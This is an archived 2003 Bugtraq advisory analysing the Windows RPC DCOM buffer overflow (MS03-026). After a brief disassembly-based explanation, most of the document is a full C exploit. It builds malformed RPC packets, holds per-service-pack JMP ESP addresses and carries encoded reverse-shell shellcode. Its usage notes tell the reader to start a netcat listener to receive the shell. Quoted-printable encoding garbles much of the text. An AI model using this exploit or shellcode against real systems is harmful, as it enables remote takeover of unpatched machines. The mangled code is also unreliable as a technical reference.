Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows :: bt723.txt

The Analysis of LSD's Buffer Overrun in Windows RPC Interface(code revised )





bugtraq

The  Analysis  of LSD's Buffer Overrun in Windows RPC Interface
Author:Flashsky
site:www.xfocus.org WWW.VENUSTECH.COM.CN WWW.SHOPSKY.COM
Email:flashsky@xfocus.org
Translator:benjurry
Email:benjurry@xfocus.org



Foreword
Jul 16th, 2003,LSD published that they had discovered a critical=
 security vulnerability in all recent 

versions of Microsoft operating systems. The vulnerability=
 affects default installations of Windows NT 

4.0, Windows 2000, Windows XP as well as Windows 2003 Server.But=
 they didn't publish codes or any 

technical details.For analysing and exploit the=
 vulnerability,Members of Xfocus have researched the  

problem and read the code day after night.Through the process,we=
 find the "Microsoft Windows 2000 RPC 

DCOM Interface DOS AND  Privilege Escalation Vulnerability",and=
 now we have gotton the reson of 

vulnerability found by LSD.We thanks all members of xfocus and=
 yuange,EYAS,IPXODI,these guys gave us 

much help.And at the same time, we admire LSD for their=
 brightness.

Analysis

In fact,MS03-026 fix two vulnerabilities,one is the local stack=
 overflow and the other is remote stack 

overflow .They  both result from the same interface,the improper=
 API is following: 
HRESULT CoGetInstanceFromFile(
  COSERVERINFO * pServerInfo, 
  CLSID * pclsid,
  IUnknown * punkOuter,
  DWORD dwClsCtx,
  DWORD grfMode,
  OLECHAR * szName,
  ULONG cmq,
  MULTI_QI * rgmqResults
);


The sixth Parameter is szName ,In MSDN it is said: File to=
 initialize the object with using 

IPersistFile::Load. May not be NULL. This parameter will result=
 in buff overflow.
hr =3D 

CoGetInstanceFromFile(pServerInfo,NULL,0,CLSCTX_REMOTE_SERVER,STG=
M_READWRITE,L"C:\\123456111111111111111

1111111111.doc",1,&qi);

When the filename is too long ,the windows will produce a local=
 buff voerflow,because the 

GetPathForServer function of RPCSS only has 0x220 space. however=
 the API checks the file in local first 

,and we can't create a file which filename is long than 0x220.So=
 we can't use this API to expoit, but we 

can use fuction of LPC by constructing packet .  Here we only=
 focus on remote stack overflow:)

After the client transfer the Parameter to the server, the server=
 will translate it to format as 

following:
L=A1=B0\\servername\c$\1234561111111111111111111111111.doc".
Then the server will get the servername first,But here is wrong,=
 the windows Does not check the 

parameter,only assigns the stack of 0x20 , 0x20 is  MAX  length=
 of NETBIOS name.Then buff overflow comes 

into being.
the key code is list as following:


GetPathForServer=A3=BA
text:761543DA                 push    ebp
text:761543DB                 mov     ebp, esp
text:761543DD                 sub     esp, 20h  <-----the length=
 is ony 0x20
text:761543E0                 mov     eax, [ebp+arg_4]
text:761543E3                 push    ebx
text:761543E4                 push    esi
text:761543E5                 mov     esi, [ebp+hMem]
text:761543E8                 push    edi
text:761543E9                 push    5Ch
text:761543EB                 pop     ebx
text:761543EC                 mov     [eax], esi
text:761543EE                 cmp     [esi], bx
text:761543F1                 mov     edi, esi
text:761543F3                 jnz     loc_761544BF
text:761543F9                 cmp     [esi+2], bx
text:761543FD                 jnz     loc_761544BF
text:76154403                 lea     eax, [ebp+String1]=
 <-----------addr to place servername =A3=AConly 

have the length of 0X20
text:76154406                 push    0
text:76154408                 push    eax
text:76154409                 push    esi       =
 =A1=B4----------------------here is the parameter of 

filename 
text:7615440A                 call    GetMachineName
=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3=A1=A3  when the=
 fuction return ,it will be buffer 

overflow.

GetMachineName:
text:7614DB6F                 mov     eax, [ebp+arg_0]
text:7614DB72                 mov     ecx, [ebp+arg_4]
text:7614DB75                 lea     edx, [eax+4]
text:7614DB78                 mov     ax, [eax+4]
text:7614DB7C                 cmp     ax, 5Ch         =
 =A1=B4-----------------check if it is 0X5C,if 

yes,the servername is over 
text:7614DB80                 jz      short loc_7614DB93
text:7614DB82                 sub     edx, ecx
text:7614DB84 
text:7614DB84 loc_7614DB84:                           ; CODE=
 XREF: sub_7614DA19+178=19j
text:7614DB84                 mov     [ecx], ax     =
 =A1=B4----------------write the servername to addr,if 

longer than 0x20,buff overflow comes into being
text:7614DB87                 inc     ecx
text:7614DB88                 inc     ecx
text:7614DB89                 mov     ax, [ecx+edx]
text:7614DB8D                 cmp     ax, 5Ch
text:7614DB91                 jnz     short loc_7614DB84
text:7614DB93 

Now here we find the problem and can exploit it.The only question=
 is that the "\\servername" is named 

bye system,but we can construct it  ourselves by sending=
 malformed messages.
BTW,there can't include "0x5c" in the shellcode because the=
 function GetMachineName checks it .


Exploit:
1=A1=A2The exploit uses JMP ESP (FF E4)to jump ,so we should adjuse=
 the address to other windows version;
2=A1=A2The shellcode can connect reversed=A3=ACso we should run nc -l -p=
 XXX first;
3=A1=A2The length of shellcode must be sizeof(shellcode)16=3D12 ,if not=
 please fill with 0x90,or the packet 

formatof RPC will be wrong;
4=A1=A2Before the buffer overflow return ,the 2 Parameters after=
 return address need to be used ,so we 

should these addresses can be written.
5=A1=A2The exploit use JMP ESP,and we can expoit by overlaying SEH.


#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>
#pragma  comment(lib,"ws2_32")
 
unsigned char bindstr[]=3D{
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,=
0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,=
0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,=
0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
 
unsigned char request1[]=3D{
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04=
,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58=
,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D=
,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00=
,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1=
,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00=
,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD=
,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00=
,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00=
,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00=
,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00=
,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC=
,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD=
,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00=
,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00=
,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00=
,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00=
,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88=
,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66=
,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00=
,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06=
,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE=
,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC=
,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00=
,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00=
,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00=
,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00=
,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17=
,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC=
,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00=
,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC=
,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC=
,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00=
,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
 
unsigned char request2[]=3D{
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
 
unsigned char request3[]=3D{
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34=
,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31=
,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31=
,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
 
 
 

unsigned int jmpesp_cn_sp3 =3D "\x29\x2c\xe2\x77";
unsigned int jmpesp_cn_sp4 =3D "\x29\x4c\xdf\x77";
unsigned int jmpesp_en_xp_sp1=3D"\xdb\x37\xd7\x77";
 

 

unsigned char sc[]=3D
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
   =
 "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x0=
0"
    "\x46\x00\x58\x00\x46\x00\x58\x00"
 
    
  "\x29\x4c\xdf\x77" //sp4
//"\x29\x2c\xe2\x77"//0x77e22c29


    "\x38\x6e\x16\x76\x0d\x6e\x16\x76"  //=D0=E8=D2=AA=CA=C7=BF=C9=D0=B4=B5=C4=C4=DA=B4=E6=B5=D8=D6=B7
       =
 //=CF=C2=C3=E6=CA=C7SHELLCODE=A3=AC=BF=C9=D2=D4=B7=C5=D7=D4=BC=BA=B5=C4SHELLCODE=A3=AC=B5=AB=B1=D8=D0=EB=B1=A3=D6=A4sc=B5=C4=D5=FB=CC=E5=B3=A4=B6=C8=
/16=3D12=A3=AC=B2=BB=C2=FA=D7=E3=D7=D4=BC=BA=CC=EE=B3=E4=D2=BB=D0=A90X90=B0=C9
        //SHELLCODE=B2=BB=B4=E6=D4=DA0X00=A3=AC0X00=D3=EB0X5C
   =
 "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x0=
1"
   =
 "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x3=
0"
    "\x93\x40\xe2\xfa"
    // code 
   =
 "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe=
1"
   =
 "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd=
2"
   =
 "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x9=
3"
   =
 "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe=
7"
   =
 "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc=
0"
   =
 "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf=
8"
   =
 "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x9=
3"
   =
 "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x9=
3"
   =
 "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe=
0"
   =
 "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x8=
7"
   =
 "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x6=
0"
   =
 "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc=
5"
   =
 "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x9=
0"
   =
 "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x2=
2"
   =
 "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x1=
8"
   =
 "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x9=
2"
   =
 "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc=
3"
   =
 "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x9=
3"
   =
 "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf=
9"
   =
 "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x1=
8"
   =
 "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xc=
e"
   =
 "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc=
6"
   =
 "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd=
7"
   =
 "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc=
4"
   =
 "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xc=
a"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 
unsigned char request4[]=3D{
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D=
,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00=
,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00=
,0x00
};
 
void main(int argc,char ** argv)
{
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=3D135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned short port1;
    DWORD cb;
    
    printf("RPC DCOM overflow Vulnerability discoveried by=
 LSD\n");
 printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry=
 xfocus org\n");
 printf("Welcome to our English Site: http://www.xfocus.org\n");
 printf("Welcome to our Chinese Site: http://www.xfocus.net\n");
 

if(argc<5)
{
  printf("useage:%s targetip localIP LocalPort=
 SPVersion\n",argv[0]);
   printf("SPVersion:\n0 w2k Chinese version +sp3\n 1 w2k Chinese=
 version +SP4\n 2 winxp English version +sp1\n");
exit(1);
}
 
if(atoi(argv[4])=3D=3D0)
memcpy(sc+36,jmpesp_cn_sp3,sizeof(jmpesp_cn_sp3));
else if (atoi(argv[4])=3D=3D1)
memcpy(sc+36,jmpesp_cn_sp4,sizeof(jmpesp_cn_sp4));
else if (atoi(argv[4])=3D=3D2)
memcpy(sc+36,jmpesp_en_xp_sp1,sizeof(jmpesp_en_xp_sp1));


    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=3D0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }
 
    addr_in.sin_family=3DAF_INET;
    addr_in.sin_port=3Dhtons(port);
    addr_in.sin_addr.S_un.S_addr=3Dinet_addr(argv[1]);
    
    if=
 ((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))=3D=3DINVALID_SOCKET)=

    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    if(WSAConnect(sock,(struct sockaddr=
 *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)=3D=3DSOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
    port1 =3D htons(atoi(argv[3]));  //=B7=B4=CF=F2=C1=AC=BD=D3=B5=C4=B6=CB=BF=DA
    port1 ^=3D 0x9393;
 cb=3Dinet_addr(argv[2]);//=B7=B4=CF=F2=C1=AC=BD=D3=B5=C4IP    
    cb ^=3D 0x93939393;
    *(unsigned short *)&sc[330+0x30] =3D port1;
    *(unsigned int *)&sc[335+0x30] =3D cb;
    len=3Dsizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=3Dsizeof(request1);
    *(DWORD *)(request2)=3D*(DWORD *)(request2)+sizeof(sc)/2; =
 //=BC=C6=CB=E3=CE=C4=BC=FE=C3=FB=CB=AB=D7=D6=BD=DA=B3=A4=B6=C8
    *(DWORD *)(request2+8)=3D*(DWORD=
 *)(request2+8)+sizeof(sc)/2;//=BC=C6=CB=E3=CE=C4=BC=FE=C3=FB=CB=AB=D7=D6=BD=DA=B3=A4=B6=C8
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=3Dlen1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=3Dlen1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=3Dlen1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=3Dlen1+sizeof(request4);
    *(DWORD *)(buf2+8)=3D*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
    //=BC=C6=CB=E3=B8=F7=D6=D6=BD=E1=B9=B9=B5=C4=B3=A4=B6=C8
    *(DWORD *)(buf2+0x10)=3D*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; =
 
    *(DWORD *)(buf2+0x80)=3D*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=3D*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=3D*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=3D*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=3D*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=3D*(DWORD=
 *)(buf2+0x18c)+sizeof(sc)-0xc;
    if (send(sock,bindstr,sizeof(bindstr),0)=3D=3DSOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
    
    len=3Drecv(sock,buf1,1000,NULL);
    if (send(sock,buf2,len1,0)=3D=3DSOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
    len=3Drecv(sock,buf1,1024,NULL);
}



About XFOCUS.ORG
   Xfocus is a non-profit and free technology organization which=
 was founded in 1998 in China. We are 

devoting to research and demonstration of weaknesses related to=
 network services and communication 

security.
We hope that we can use new technical tools to achieve our goal,=
 and to broaden our outlook. We also 

hope we can communicate and help with each other through this=
 amazing Internet.
   
   From the Internet. For the Internet. Have fun! 
---


=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=D6=C2
=C0=F1=A3=A1
 =09=09=09=09

=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1xundi
=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1xundi@xfocus.org
=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A1=A12003-07-25



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH